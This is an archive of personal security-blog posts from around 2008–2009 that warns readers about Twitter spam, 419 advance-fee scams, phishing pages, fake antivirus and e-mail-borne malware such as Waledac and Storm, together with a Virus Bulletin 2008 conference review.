Spam on Twitter = Twam?

I've no idea how many of you out there in blog-land use Twitter, but I'd guess quite a few of you do?

As a relatively new Twitter user, I've not seen much of the problems that Twitter has experienced over the last year, including account hacking, phishing, 419 scams, worms and other malcode problems. One area that seems (at least to me) to have been rather quiet has been spam via Twitter.

Until the last week or so, I've never received any. I'd be interested to know how many of you out there in blog-land who use Twitter have seen similar things to what I'm about to discuss.

I don't think there is a specific name for Twitter spam, so I've coined one; Twam.

I'm sure the more creative of you out there can come up with something better?

Let's have a look at a couple of examples I've seen in the last week or so:

1. The Vote For Me Twam
I received the following notification and when I checked out the profile for that user all their tweets were requests to vote for them in some beauty pageant.



As you can see at the time I was sent this they had a fair few followers and were following (Twamming) lots of other Twitter users. when I checked this particular account again this morning, it was still active and still only begging for you to vote for her at 60P per text no less! The number of followers now stands at 343 and she is following (Twamming) 1,986 other Twitter users.

2. The Porn Advertising Twam
I received the following notification just this morning and when I checked out the profile for that user they only have one tweet with a link to a porn site! So.they seem to be using Twitter to advertise their porn site.



Shortly after receiving the above notification, I received another using the same name, but from a different Twitter account. Their feed was exactly the same as the first one I received just 30 minutes earlier.

When I just checked both of these accounts (before publishing this) that were advertising a porn website they have now been closed by Twitter.

Needless to say I have blocked these Twitter accounts, as I don't want to see what they offer and I don't want to give them any credibility by being seen as being followed by them.

I wonder if this is the start of a major spam (twam) attack on this social networking site? I wouldn't be surprised as this fate has already befallen FaceBook, Myspace and many other similar sites.

For those of you who are interested in following me on Twitter (no not you spammers/twammers) you can easily find me via my name or my Twitter account which is talkytoaster.

If you spot anything interesting feel free to send me a Tweet or a Direct message.

Take care and happy Tweeting.

FREE GALA BINGO E-MAIL LOTTERY PROMO

The 419 scammers have a decided to use Gala, a UK Bingo and on-line gaming company as their latest one to impersonate, they do this to try and get you to swallow their scam as real.

Here's a couple of screen shots showing one copy of the emails I've seen so far today:





The use of a "trusted" brand name is to try and make it more believable, so that you will be willing to actually contact them to try and get the alleged winnings.

However, you'll end up being put on a suckers list; receiving even more of these scams, even via the postal service and over the phone too. Not only that you will also be asked to pay some administrative or legal fees to release the money to you...there is no money, you haven't won anything except the chance to be less gullible in the future.

If you want to find out more about these scams and how they work you can find other postings on the subject on this blog, and also on my published papers and articles page here: http://momusings/com/papers

If you get an email claiming that you've won something in a competition you never entered be very skeptical. If you want to know if it is real or not then please feel free to contact me.

Gala do appear to have a lottery game, but it is online at their website, they don't do e-mail lottery at all....you have been warned ;-)

Look here Kido, stop trying to Conficker my computer...

Yes, I know I haven't posted for ages, but I've been kind of busy helping customers with outbreaks, ethical hacking, application testing and computer forensics. I have also been busy writing an article for a magazine (more on that in a moment) and writing abstracts for the 2009 Virus Bulletin conference; one of which was accepted, I'll blog about that when I have more time.

OK, enough of the lame excuses from me.

So, back to the article...

Over the last few months one particular malware family has been hyped out of all proportion and unless you've been living under a rock or had no access to a computer since the end of November you must already know which malware family I'm writing about?

At the beginning of March this year, after spending a significant amount of time dealing with the most virulent variant at that time, the B variant (or variants). I was asked to write an article for a magazine on Conficker, which I duly did.

It was submitted, and I'd made it clear that there was no way that my employer would willing waive it's copyright. So, what do I get asked to sign?

So, to cut a long story short, it was agreed that the article would not be published by the magazine after all, but I could publish it on my blog, etc. as long as my employers copyright of the material was mentioned.

The upshot of this is my article on the evolution and functionality of Conficker. Please bear in mind that this was completed on the 9th of March 2008, weeks before every man and his cerberus had decided they ought to write such an article.

I hope that you find it useful, enlightening and maybe entertaining too?

The article entitled "Have you been Confickered" can be found here: http://momusings.com/papers/Have-You-Been-Confickered-v1.01.pdf

As usual all feedback is most welcome.

Discount Coupons from Hell...

We all like a bargain, right?

How many of you out there use coupons to get discounts on things you buy, or plan to buy?

Do you use the paper coupons that you get from flyers, papers, magazines and brochures, or do you use the electronic coupon codes instead?

Whichever you do use, I'm sure that you all love the feeling that you've saved some of your hard earned money by using them? Of course the cynics amongst us would say it is just social engineering to get us to buy a particular brand or even buy something we didn't really plan to buy, or in some cases even need.......So whilst I'm on this topic I was intrigued when I received the following email yesterday:

Here's a screenshot of one of the email that I've received:



Oh goody I thought, coupons! ;-)

I clicked on the link and this is where I ended up:



Now that's interesting, how have they managed to show me offers for a town near where I live?

A quick look at the page source shows that they are using GeoIP [Geographic resolution of the IP address used to request the page, in other words my routers public IP address].

So, if you are in say Manchester, UK you would be shown ones allegedly tailored for that area, likewise if you are in, say, San Diego, US or Munich, Germany or even Sydney, Australia.

More digging shows that the page is also laced with exploit code, to catch the un-patched and infect their systems [using a hidden IFRAME].

So, what happens when I click on the 'Click Here' icon on the page?

Ah, I get offered an executable file [list.exe], not a PDF or any real coupons at all, a windows binary file that I suspect is actually malware, probably a new variant of Waledac. So lets refresh the page and see if anything changes?

Yes, the filename offered changes, after the page reload it became: saleslist.exe! More page reloads show that it is using a number of different names in rotation. So, I scanned the files [both of them] and they are identical in size and MD5 hash, this means they are identical internally.

At the time of posting this blog entry the detection of the offered files was rather poor, with only 9 out of 32 tested scanners identifying that this is a malicious file. Most of the ones that did detect it were using heuristic or generic detection, which means this is indeed a new variant.

So it sems that once more the bad guys and girls are trying new social engineering techniques to try and get us to infect our systems and effectively press-gang our systems into the botnet army they control. These are the same group of cyber-criinals responsible for the Valentine Day fake e-card development kit that I blogged about recently.

Here are some useful links if you want to know more about Waledac [please bear in mind that the descriptions used may not be valid for this new variant]:

• http://www.securitypronews.com/insiderreports/insider/spn-49-20081231StormWormReincarnatesAsWaledac.html


• http://www.symantec.com/en/th/enterprise/security_response/writeup.jsp?docid=2008-122308-1429-99


• http://www.f-secure.com/v-descs/email-worm_w32_waledac_a.shtml

Don't let your guard down just because you think you are getting a good deal, some free coupons, free iPod, laptop, or whatever.......Just remember there is no such thing as a free lunch, someone has to pay for it, either directly or indirectly, don't let it be you...

UPDATE:
As I was finishing off this blog entry, I re-checked the site, and found that the files offered, still use the same list of names [15 so far], but the filesize and MD5 hash value is now different to yesterdays. Seems they are seeding new variants each day.....so, be on you guard!

Another Valentine's Day...

...Another Chance to Get Infected!

I hope that you are all ready for a safe and pleasant, if not wonderful, Valentines Day on Saturday?

It seems that the bad guys and girls are back playing cupid again and couldn't resist the opportunity to try and get you to infect your computer, yet again using the guise of a valentine e-card, again. The latest wave of these started yesterday:

Here's a screenshot of one of the email that I've received:



If you are foolish enough to click on the link in the email, you'll end up on a page that looks like the one below, at least for now it does:



Very nice of them to offer you a tool to make your own valentine day greetings? Of course, in reality it is just an infected file used to recruit your PC into the botnet army of the author of this malcode.

When I first started to see these Valentine Day e-mails, late last week [a test run maybe?] the landing page looked like this instead:



However you spend the day, whatever you do for the 'love-of-your-life', don't become part of the collateral damage of the annual 'Valentine's Day [Malware] Massacre'.

If I see anymore 'bogus' Valentine's Day e-mails, I'll try and post details here when I can. Also, if you see any that I haven't yet posted about, then please let me know.

Hopefully, between us we can try and keep the annual massacre down to a mere scuffle! ;-)

At the time of posting this blog entry the detection of the offered files [at least two distinct unique files (MD5 hash value)] was very poor, with only 4 out of 32 tested scanners identifying that this is a malicious file.

Furthermore the file being offered is offering different file names, although the actual file is internally identical in many cases, as mentioned above.

If I get any further useful data or news then I'll try and post it here.

Oh, and don't forget the risk of getting an infection isn't just for Valentine's Day, it is for everyday of the year, don't let your guard down.......stay safe!

McDonald's Survey

I'd like to start this post with an apology [yes, again] as I have been rather slack in posting for quite a few weeks now. This has been due to a number of issues beyond my control including yet another change in my role. I still hope to post material here as often as I can, but it probably won't be as frequent as it has been. So, to try and start the ball rolling once more I have the following phishy tale for you to enjoy.

Here's a new one I've not seen before, the following e-mail arrived in my 'Phish' inbox late last night [screenshot below]:



That's nice if I answer just seven questions in a simple survey I will get £25.....I smell a phish, so what do we see when I click on the link?



Hmmmmm.....looks pretty good, quite believable wouldn't you say?

So, let me see what happens when I fill out the details with bogus data. First let me enter some bogus data for the survey and then click on submit. This is where I'm taken too next:



Aha.....Just as I suspected, this is a phish, as it wants personal data and my credit card data, including the CVV so that the promised £25 can be credited to my card, yeah right. So, let me enter in some more bogus data and click on the Submit button again.

I particularly like the mis-use of the MasterCard SecureCode,VeriSign and Verified by Visa logos, just trying to make you feel secure, how reassuring, eh?




The final page [shown above]informs me that my data has been entered correctly [yeah right!] and that I should see my £25 credit payment on my credit card within 3-5 businees days. More like my credit card will be misused or sold on to others to misuse within 3-5 businees days! Oh, and then I get taken to the real McDonalds UK website, nice ;-)

So, it seems that I was right to be suspicious, in fact a quick look at the link in the original e-mail made it obvious to me that this was a phishing scam.

The interesting thing about this Phishing attempt is that this is the first time I've seen one targeting McDonalds in the UK.

So, if you are an McDonald's customer, or think that you'd like £25 for free, be on your guard as it seems that the phishers are now spending significant amounts of their time to finely target their potential victims and try and get you to disclose your details....

As a final note, the Netcraft toolbar plugin which works with Internet Explorer and Firefox now has the domains used for this phish in their database. So, install it and use it, it could save you from making an expensive mistake!

Financial In-Fidelity, Yours For 72.5 Million US Dollars!

Here's an offer I received via e-mail that seems to be the answer to most peoples prayers; a large pile of money just for helping out someone move some money. Of course in reality it isn't as simple as that, but I'm getting ahead of myself.

Here's a screenshot of the e-mail in full:



It says it was sent by Tim McCarron of Fidelity Investments here in the UK. He is a fund manager for them. It seems that Tim, allegedly, has acquired over 145 Million US Dollars from his employers without their knowledge. Moreover he wants my help to move the funds, and for my trouble he will give me 50 percent; very generous. That is over 72.5 Million US Dollars.....tempting, isn't it? ;-)

All he wants from me are some personal details, some proof of identity, such as a copy of my drivers licence or passport, and a bank account number to use for the transaction.

To prove that he really exists, Tim has even included a link to some details about himself and his performance which is available on the Fidelity Investments website.  How thoughtful!

Here's a screenshot of the webpage in the first link:



See, there's Tim's name and various other detals about him and the funds he manages. Yes, this is the real Fidelity Investments website.

Let's look in to this in more detail.

OK, the email reply address seems odd, it is timmacarron@superposta.com (seems Tim can't even spell his surname correctly) but the From: address header in the email tells me his email address is tmcarron@ymail.com......hmmm, I'm confused. I know he is trying to cover his tracks, but why use two free webmail addresses?

So, what does this tell me?

Well for one this email is not from the real Tim McCarron, or from anyone at Fidelity Investments. Furthermore, there is NO MONEY; sorry to disappoint you.

If it was real, then the person responsible would have committed fraud; as they have stolen money from their employers and potentially customers too. Furthermore, if you took part in this, if it was real, you would also be committing fraud as well as money laundering....lucky there is no money then, eh? ;-)

Yes, this is yet another 419 scam [aka the Nigerian scam, also known as Advance-Fee-Fraud]. If you were foolish enough to reply to the email you would be assured that the money was real, but somehwere along the way you would be asked to part with money to pay for things such as, handling fees, taxes, shipping fees, and maybe even bribes! So, instead
of getting the alleged money you were promised, you would end up losing money, or worse. You would also end up on a so-called "suckers list" and get more 419s, not only via e-mail, but also through your letterbox.

So next time you receive such a tempting offer, remember the old adage "if something seems too good to be true, it probably is....too good to be true". Also, think very carefully before
you click on any links or contact anyone mentioned in these email, at the very least you could end up on a phishing site, you could lose some of your money, or worse, as there have been cases of beatings and even murders linked to these scams.

Oh, and just in case you were wondering, the links in the email were included by the scammer to try and give extra credence to their outlandish financial proposal.

If you want to read more on the subject of 419s then I have written several articles which were published in the Virus Bulletin magazine, reprints of these can be found here, [http://momusings.com/papers] along with all my other published articles and papers.

Oh yes, and the personal details you supply them will almost certainly be used for identity theft and/or in another 419 scam, using your personal details and proofs to attempt to make it more believable.

Amazon Marketplace Listing Canceled...

How many of you out there use Amazon's Marketplace to sell items?

Well, if you do then this posting should be of some interest and I'd also be interested in how many of you have received similar emails to the one shown in the screenshot below:



Looks like a typical notification from Amazon that your item listed on Amazon Marketplace has been canceled; for those that use this Amazon service this usually happens when your item listing has expired, and is quite normal.

So, let me see where I end up when I click on the link contained in the e-mail; screenshot below:

 

Is this Amazon.co.uk? Looks genuine doesn't it? would you sign-in via this page, or not?

For the moment, let us assume [quite rightly] that I'm suspicious of this page, let me have a look at the source HTML for the page above; I'm especially interested in the FORM section (the bit that deals with the login credentials; your e-mail address and Amazon.co.uk password). Here's a screenshot of the related part of the HTML source for that function:




Hmmm.....notice anything odd?

Surely the real Amazon.co.uk doesn't use a generic mailto CGI script [in this case a PERL script] to handle login routines, does it?

No, of course it doesn't, the code in the screenshot above sends your now stolen Amazon.co.uk login details to the bad guys and girls via e-mail using the mailto.pl script hosted on http://www-cgi.paonline. It then goes onto send you to the real Amazon.co.uk page, sneaky huh?

So, this is another phishing scam, in this case they want to steal you Amazon login credentials, so that they can steal any personal details, including and stored credit-card data, or maybe they just want to buy things using your account, and have them sent to a drop-box to then be turned into cash. Such as ordering themselves a new MP3 player, phone, some CD's or DVD's or whatever, leaving you to pick up the bill and deal with the resulting mess.

Of course this type of attack is not just limited to Amazon, it would in theory work with any e-commerce site, so be careful out there especially where you have sites that store you credit-card details, as in most cases this is what the bad-guys and girls are after. If they can't get that then they will just buy things from the site using your stored card data instead.

yet again, as with other recent examples I've blogged about it shows that phishers are not just interested in getting you bank details, they are just as happy to get e-commerce site credentials, game login credentials (such as WoW) or webmail account details (how many of you store e-mails which contain personal or financial  details?), amongst many others. Furthermore, do you you the same password for more than a single site? If you do then you are making it easier for the bad guys and girls to compromise your other accounts wherever they may be.

Yahoo Calendar Invites Trouble...

Well, I received a rather interesting invite sent to me via the Yahoo! Calendar service. Have a look at it [screenshot below], what do you think?

 

Hands up all those that are tempted to respond to this?

OK

Now, hands up all those that are NOT tempted to respond to this?

Hmmm....

So, before I cover this in more detail, let me see what happens when I click on the RSVP to this invitation text, which is a hyperlink. This is where we end up [screenshot below]



This is the real Yahoo! Calendar website, so it isn't a phishing scam, is it? Is it real, does someone really want to give me a cheque for 1.5 Million US Dollars, or is it some other form of scam?

OK, time to tell you what is going on here, and what the e-mail is all about, and why the sender used Yahoo! Calendar to send it.

The email really was sent via the Yahoo! Calendar service, and clicking on the link contained in the e-mail really does take you to the genuine Yahoo! Calendar site and a real Yahoo! Calendar invite. But why?

The answer to the why, is that this enabled the e-mail sender to have a better chance of getting the email, seen in the first screenshot, to the intended recipients, yes I said recipients, not recipient. Did you notice that in the web site screenshot the 90 undecided text? Yes, this invite was sent to 90 intended recipients, not just me. Does this mean that this was sent by someone with over 135 Million US Dollars to give away?

Of course not, this is just a new twist on the old 419 scam [aka the Nigerian scam, also known as Advance-Fee-Fraud]. The sender just used the Yahoo! Calendar service to try and increase the chances of his invite [the scam text in the invite] getting past any anti-spam defences that the intended recipients might have in place.

There is no money [sorry!], there never was, if you were foolish enough to contact Mr Luke Yayi, you would be assured that the money was real, but somewhere along the way you would be asked to part with money to pay for things such as, handling fees, taxes, shipping fees, and maybe even bribes! So, instead of getting the alleged money you were promised, you would end up losing money, or worse. You would also end up on a so-called "suckers list" and get more 419s, not only via e-mail, but also through your letterbox.

So next time you receive such an invite, not only ones from a calendar service; it could be from any online service, such as: news groups, blogs, social-networking sites, feedback forms, mailing lists and so on. Think very carefully before you click on any links or contact anyone mentioned in the invites/e-mail body, at the very least you could end up on a phishing site, at worst you could lose money, or worse, as there have been cases of beatings and even murders linked to these scams.

If you want to read more on the subject of 419s then I have written several articles which were published in the Virus Bulletin magazine, reprints of these can be found here, [http://momusings.com/papers] along with all my other published articles and papers.

Right, I need to put together another presentation for yet another conference, this time I'm covering penetration testing and ethical hacking.

Virus Bulletin 2008 Conference Review

As previously mentioned on this blog, I was going to attend the Virus Bulletin 2008 conference as just a delegate, for the very first time; I usually attend as a speaker. The conference was held at the Westin Ottawa, in Ottawa, Canada [surprisingly ;-)] between the 1st and 3rd of October.

However, I ended up being a speaker again, which I don't mind, but I was actually looking forward to having a more relaxed conference than I usually do, but that's life!



This posting is a quick review of the conference:

Day 1 - Wednesday 1st October 2008

The first day of the conference started at 10:30 with Helen Martin’s opening address, this was followed at 11:00 by the Keynote address "The AV industry: Quo Vadis?" presented by Alex Eckelberry of Sunbelt Software. This was a very interesting speech and contained lots of useful information, as well as a general overview of what the bad guys [and girls] are up to, as well as what the good guys [and girls] are up to.

You can find a recording of it here, along with the slides: http://sunbeltblog.blogspot.com/2008/10/virus-bulletin-2008-keynote-address.html

The final session on the Technical Stream before lunch was also interesting, a presentation by Morton Swimmer [who used to work for IBM] entitled:

• Towards integrated malware defence

It was a good presentation, however as Morton had moved to TREND just before the conference he no longer had access to all his data, which was a shame, as it seems to have been rather an effective solution.

Then it was time for lunch.

After lunch, the conference continued in its normal two stream mode; Corporate stream and Technical steam. Normally I spend most of the conference in the technical stream, and on this first day that was pretty much the case. I spent the whole afternoon in the Technical Stream.

The first two presentation after lunch were:

• Your computer is now stoned (...again!). The rise of MBR rootkit - Kimmo Kasslin, F-Secure
• When the hammer falls - effects of successful widespread disinfection on malware development and direction - Matt McCormack, Microsoft

The presentation given by Kimmo was esepcially interesting as it covered the rebirth of MBR infectors; something that had almost died out when Windows NT, 2000 and XP came along [yes there have been some MBR infectors for those, but not many, and not with stealth capability].

Then we had a short break for Tea and coffee before the attending the final pair of presentations on the technical stream. These were:

• Applying user-mode memory scanning on Windows NT - Eric Uday Kumar, Authentium
• Packer visualisation: a fast entropy scanning algorithm that preserves local detail - Li Sun, RMIT University

I decided to sit in on the vendor presentation after the days main proceedings, this was given by my good friend David Harley, from Eset.

Later we had the "Welcome drinks reception" which is a nice ice-breaker, especially for those that have not been to a VB Conference before as it is very informal and relaxed.

This was staged with a couple of Ice Hockey players; for those that wanted pictures, as well as a bit of fun from Ken Bechtel, who's hat did the rounds and photos were taken of those that ended up wearing it, including me. If you've ever met Ken, you'll know which hat I mean as he is rarely seen without it.

Day 2 - Thursday 2nd October 2008

Day two started early for me as I was informed when I arrived that I might be needed to present [I was the emergency reserve speaker; "in case of a missing speaker, break glass and grab Martin ;-)"], as one of the speakers for the morning session on the Technical Stream was unaccounted for; he never did turn up.

So, I had to go back to my hotel [I wasn't staying at the Westin], get changed, grab my laptop and get back to the conference by the morning tea break to check that my laptop worked fine with the projector, it did.

This meant that I effectively missed the first two presentations I had planned to attend, oh well.

To complicate matters, I was also supposed to be chairing the three sessions on the Corporate Stream between the morning tea break and lunch; which I couldn't now do, as I was presenting in the other stream at the same time. Luckily, my old friend from Nortel, John Morris, stepped into the void as the new session chair.

So after the morning tea-break I was back in the Technical Stream for the next three presentations, these were:

• The robustness of new email identification standards - Reza Rajabiun, COMDOM Software and York University
• Coordinated distributions method for tracking botnets sending out spam - Andrey Bakhmutov, Kaspersky Lab
• Malware forenscis: detecting the unknown - Martin Overton, IBM ISS

The presentation given by Andrey was extremely good, some excellent research which was well presented and explained. This led to a flurry of questions.

It seemed rather surreal when I gave my presentation, as it was designed for an audience on the Corporate Stream; so as an old English saying goes "it was like teaching my grandmother how to suck eggs". In other words the presentation was an overview of forensic techniques and tools for finding and analysing malware [known or new] on an infected system.

This was presented on the Technical Stream to about 70 or more of the worlds best malware researchers, hence my use of the saying.

The presentation was actually based on my EICAR 2008 paper which I was unable to present at the EICAR conference, ironically due to the fact I was tied up in a malware forensics case.

Then it was time for Lunch, not only to refuel with food, but also to discuss and digest what we'd seen so far.

I received some nice feedback from a few of those that sat in, and no awkward questions. In fact one of the guys who were running the audio-visual side of the conference said he thoroughly enjoyed my presentation and found it most useful and enlightening.

After lunch, once more I decided to sit in on the Technical Stream until the tea/coffee break, at least. The next four presentations, all last minute ones limited to 20 minutes each, were:

• VB testing - present status, future plans, John Hawes, Virus Bulletin
• Race to zero with online scanners, Boris Lau, Sophos
• There is (some) honour among South American authors of infostealer trojans!, Pedro Bueno, McAfee
• Apple iPhone programming with SDK, Marius van Oers, McAfee

This year these short technical presentation worked rather well, although it was hard for some of the presenters to keep to the 20 minute slot limit, yes, you know who you are.

Then it was time for another caffeine break ;-)

After the tea/coffee break I moved to the Corporate Stream as I was chairing the last two presentations on that stream, these were:

• The NorTel Mailer: effective open-source spam filtering for enterprises - Chris Lewis, Nortel
• SCADA security - who is really in control of our control systems? - Peter Allor, IBM

Both of these were very interesting presentations and it was a shame that so few delegates had decided to sit in on them.

Before the day was over we also had our first panel session, this was:

• The state of anti-malware testing

Later we had the "pre-dinner drinks and the Gala dinner and entertainment".

As always the food was excellent and the entertainment this year differed quite a bit, it was a quiz, which was fun but took longer than expected to complete. As one delegate was heard to say "we have travelled 3,500 miles for a pub quiz!". Personally, I enjoyed it, it just needed to be shorter.


Day 3 - Friday 3rd October 2008

The final day of the conference had arrived, I'm still not sure where the first two days had gone, but they sure went quickly!

As we started slightly later on the last day, to allow for those that had partied hard until the small-hours to get some sleep, and maybe quite a bit of black coffee, there was only a single presentation before the first coffee/tea break of the day. The one I decided to attend was on the Corporate Stream, again:

• Understanding and teaching bots and botnets - Randy Abrams, ESET

This presentation covered a topic that I had presented on back at VB2005 in Dublin, but from a high-level perspective and more focussed on how to educate staff about these threats via using robot vacum cleaners known as Roombas.

As usual Randy was both informative and entertaining.

So, another quick tea and coffee break and then back to the Technical Stream until lunch, these were the next presentations I sat in on:

• Automatic rules-based binary analysis with IDA Pro and CLIPS - Ryan Hicks, AVG
• Rebuilding testing for the future - Igor Muttik
• Samples.malware.org: sample sharing for the next decade? - Richard Ford, Florida Institute of Technology

All of these were very good and interesting talks and all generated lots of discussion and questions.

Then it was time for the final lunch of the conference, but before that, all the speakers had to get together for the traditional "Speakers Photo". As usual, much hilarity was had by all. However, I think I can honestly say that this years photo was the quickest ever as it took less than 5 minutes to organise all the speakers and take a number of photos.

After lunch I spent the first part of the afternoon on the Corporate Stream.These were the presentations I sat in on:

• Where do your users want to go today and can you stop them? - Bruce Hughes, AVG
• The name of the dose: does malware naming still matter? - Pierre-Marc Bureau and David Harley, ESET

Both of these were interesting and prompted a number of questions from the audience.

Then it was time for the final refreshments break. Yes, it was the very last VB2008 Tea and coffee break of the whole conference.

The final presentations of the day, and the conference, were straight after the break and I decided that I'd sit in on the last one on the Technical Stream again. This was:

• Darwin inside the machines: malware evolution and the consequences for computer security - Peter Ször, Symantec
  Dimitris Iliopoulos, Keck Graduate Institute of Applied Life Science

This was a very interesting presentation, basically saying that malcode could in theory evolve following Darwinian principles. Not sure that we will see such malware any time soon, as there are a number of things that need to happen first.

Although all the conference papers presentations had finished there was a very interesting and lively panel discussion on:

• Security in banking forum

Finally it was time for the Conference closing session, once more led by Helen Martin, the editor of Virus Bulletin.

It included the usual selection of scenic photos as well as general candid shots taken during the conference, including some 'comic' ones. This year it seemed to be another case of "I'm Sparticus", as a lot of people seemed to be wearing Ken Bechtel's hat, including me, and no it wasn't him in varying disguises either!

My final impressions of VB2008 are mixed; I enjoyed it, but I [and others who I chatted with] seem to think it may have lost its edge. Is this a case of becoming too commercialised or due to a lack of the usual swathe of quality research papers [which may be due to security companies cutting research budgets], or is it just a sign of the times as the marketplace has matured and that threats have now converged?

If you attended VB2008 and have an opinion, then please let me know your thoughts, thanks.

Copies of the slides used by the speakers during the presentations can be found here: http://www.virusbtn.com/conference/vb2008/slides

The full agenda for the conference can be found here: http://www.virusbtn.com/conference/vb2008/programme/index

Finally, if you are really curious and want something to put you to sleep, then you can also find a selection of scenic photos I took whilst in Ottawa, here: http://picasaweb.google.com/overtonm/OttawaCanada2008?authkey=SEeottY873o#

Well, that's another VB conference covered, I'm already looking forward to the possibility of attending next year, where it will be in Geneva, Switzerland at the end of September 2009. Right, now I need to find some ideas for a few abstracts to submit....any suggestions?

Virus Bulletin 2008 International Conference

Next week the Virus Bulletin International Conference is being held in Ottawa, Canada [1st to the 3rd of October]. This is the premier conference for people involved with fighting malware and related security threats. The programme can be found here.

This year I was going to be there just as a delegate; normally when I attend this conference I attend as a speaker, which means I have to write a paper and present it at the conference to an audience of 50-200 uber-geeks from various industries as well as the world's best malware researchers.  This can be pretty daunting! This will be my 11th Virus Bulletin Conference since my very first I attended and presented at back in 1996.

However, I've now been asked to be a reserve speaker, so I have to have a presentation ready, just in case I'm needed. The last time I was a reserve speaker it was for VB2002 which was held in New Orleans that year, and was nearly washed away by a hurricane! Needless to say, I ended up presenting my paper that year.

If any of you ready this are going to be there, then please feel free to stop me and have a chat, or just to say hello. I don't bite, honest ;-)

The presentation I am working on for the conference is to do with malware forensics, so it should be fun to do, as well as interesting for any audience I get; if I get to present it, that is.

As usual, I will write a short review of the conference, including what I personally found interesting, and may also post some mini-reviews and updates via Twitter.

If you can make it, then I hope to see you there; if not then stay tuned and I'll post a review as soon as I can.

American Airlines Survey

I'd like to start this post with an apology as I have been rather slack in posting for quite a few weeks now. This has been due to a number of issues beyond my control including yet another change in my role. I still hope to post material here as often as I can, but it probably won't be as frequent as it has been. So, to try and start the ball rolling once more I have the following phishy tale for you to enjoy.

Here's a new one I've not seen before, the following e-mail arrived in my 'Phish' inbox late last night [screenshot below]:



That's nice if I answer five questions in a simple survey I will get $50.....I smell a phish, so what do we see when I click on the link?



So, let me see what happens when I fill out the details with bogus data. First let me enter some bogus data for the AAdvantage number and password, and then click on go. This is where I'm taken too next



As you can see, I'm now asked for my Bonus Code and the rest of the page is the alleged survey. So, I'll fill this in, again using bogus data. Interestingly the Bonus Code is the same in all the copies I've received, to multiple e-mail honeypot addresses too. So, now all the data has been entered, let me click on the continue button and see where we go next.



Aha.....Just as I suspected, this is a phish, as it not only asks for personal details, it also wants credit card data, including the CVV and an ATM PIN number too. So, let me enter in some more bogus data and click on the continue button again.

The final page shown informs me that my data has been entered correctly [yeah right!] and that I should see my bonus of $50 on my credit card within 72 hours. More like my credit card will be misused or sold on to others to misuse within 72 hours!

For those of you who like the detail behind the web-page, here is a screenshot of the first page, showing that the actual page is being rendered from two other sites. You may also notice that this phishing site is hosted on Yahoo servers.



Here is a screenshot showing part of the whois record for the phishy domain being used as a front for this scam.



So, it seems that I was right to be suspicious, in fact a quick look at the link in the original e-mail made it obvious to me that this was a phishing scam.

The interesting thing about this Phishing attempt is that this is the first time I've seen one targeting an airline, in fact I'd go as far as saying that this may be a 'Spear Phishing' attempt as it seems to have been sent to a small number of people and in far smaller numbers that the more traditional bank phish I see day in and day out..

So, if you are an American Airlines customer be on your guard as it seems that the phishers are now spending significant amounts of their time to finely target their potential victims and try and get you to disclose your details....

As a final note, the Netcraft toolbar plugin which works with Internet Explorer and Firefox now has the domains used for this phish in their database. So, install it and use it, it could save you from making an expensive mistake!

FREE Anti-Virus Software...

I thought it is about time for me to cover this again due to the current world-wide credit crunch and fuel, power and food costs soaring. This means many people are looking for ways to cut costs; including costs for protecting their computers. FREE isn't a bad word, but the bad guys and girls have started to make it feel like it ought to be. The phrase Caveat Emptor [Let The Buyer Beware] seems to be more pertinent than ever.

What do I mean by "the bad guys and girls have started to make it feel that it ought to be"? Let me explain:

Look at these for examples of the rather naughty ways that the bad guys and girls are trying to get you to download and use their anti-virus:

First they try scare tactics:



Then they try a little more direct approach:



If you are foolish enough to go to the sites, then this is what you'd currently see:



Looks very professional, doesn't it? Hard to believe that this is a bad site! Want proof? OK, here it is:



That is the very same site [URL] but visited using Firefox 3.x instead.

But that isn't all, this site is also being promoted by a botnet called Asprox. This botnet searches for sites using SQL, and it then tries to run exploit code, which if successful, overwrites all URLs in the database with a single link. If this now 'bogus' link is clicked on a website using the SQL injected database for content, it starts a chain reaction, which often ultimately ends up either on the site shown above, or it may infect vulnerable systems using exploit code that was run as part of the chain reaction. This may include infecting your system and making it part of the Asprox botnet.

But there's more.....

Here's a screenshot of another e-mail I received recently:



The link, if foolishly clicked on, takes you here:



Does it look familiar?

Here's a screenshot of the source of the above page:



Notice how it uses the REFRESH function to popup a download of the executable they offer; no it isn't anti-virus software, it is actually malware!

So, who can you trust if you want FREE anti-virus software?

These are the FREE ones I'd personally recommend include:

• AVG


• Avast


• AntiVir

Please be aware that there are a number of 'bogus' anti-spyware tools out there too and probably even 'bogus' personal firewalls.

You can find all the links mentioned above, and other useful tools, etc. here.

At the end of the day to help keep you system free of net nasties and their kin, you need to ensure that you have a personal firewall, up to date anti-virus installed, anti-spyware tool(s) installed, and last but not least practice 'Safe-Hex'.

Computer problems are bad enough most of the time which means the following anti-stress kit might be useful? However once you add malware to the more usual computer problems it becomes a must have piece of kit, well it stops the common hair-loss normally associated with stress! ;-)





Hopefully, this posting will help you retain your sanity, or at least reduce the cranial damage you may do to yourself using the above anti-stress kit.

Be careful out there, the web is a dangerous place without suitable protection...

If any of you out there in blog land have other security software that you recommend then please feel free to drop me a line or leave the details in a comment.Thanks!

Phishing for Feedback?

According to the e-mail I received this morning HSBC have a customer survey they would like me to take.

For starters here's a screenshot of the e-mail I received:



I'm always willing to give feedback to companies I use, but I am not an HSBC customer, so let us see where we go when the link is clicked?



Looks like a normal survey so far, apart from the dodgy website address [IP dotted]. So let me fake some data and click on the submit button, here goes:



Ah, now I smell something very phishy indeed [even if I didn't before ;-)]. They want some account details; Ker-ching!

Oh, yes and there is no prize money, so don't expect to win, just like the fake lottery notifications that you get, it is just a scam.

Each phishing e-mail I receive is checked; all links are tested against the Netcraft toolbar, and any new ones, that the Netcraft toolbar doesn't yet know about are submitted for inclusion in their database. Nothing too unusual there. However, once in a while I spot something that makes a new phish stand out from the crowd, such as this one.

At the time I tested these links to the bogus [phishy] HSBC survey site it was not detected by the Netcraft toolbar, or even the Firefox anti-phishing functions which are now built into the browser. As I finish up writing this post Netcraft should now have it in their database as I sent them the details.

Just be careful when acting on requests for participating in surveys for companies you use, as they may be phishy and you may get more than you bargained for. In those phishy cases it is likely that your personal data will be stolen and used to make fraudulent transactions on your account.

A Stormy Independence Day...

It seems that the so-called 'Storm Worm Gang' are back and couldn't resist the opportunity to try and get you to infect your computer again using the guise of a 4th of July [American Independence Day] firework show. This latest wave started early this morning:

The subjects of the e-mails I've seen so far include:

America the Beautiful
Celebrating the spirit of our Country
Time for Fireworks
Well done 4th!
Light up the sky
The best firework you've ever seen
Long Live America
Celebrating the Glory of our Nation
American Independence Day

The body of all the e-mails seen so far contain a single line of text and a URL [the usual dotted IP sort, e.g. http://100.123.12.1], here are just a small selection of the text I've seen used so far:

A Hearty Wish
